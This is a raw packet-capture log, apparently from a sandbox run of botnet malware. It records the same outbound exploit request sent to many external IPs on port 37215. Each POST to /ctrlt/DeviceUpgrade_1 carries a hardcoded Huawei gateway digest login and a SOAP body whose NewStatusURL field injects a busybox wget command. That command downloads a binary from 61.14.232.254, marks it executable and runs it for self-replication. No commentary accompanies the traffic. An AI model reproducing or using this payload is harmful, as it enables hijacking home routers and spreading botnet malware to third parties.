                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2043192.168.2.133444434.230.207.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689002991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2044192.168.2.1357034157.67.235.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689043999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2045192.168.2.1349440157.251.252.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689055920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2046192.168.2.1343002197.191.243.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689055920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2047192.168.2.1356466151.133.198.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689080954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2048192.168.2.1334344197.20.1.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689097881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2049192.168.2.1351092195.26.86.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689116955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2050192.168.2.1341900197.132.162.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689137936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2051192.168.2.1354918202.52.114.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689160109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2052192.168.2.133791094.22.71.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689181089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
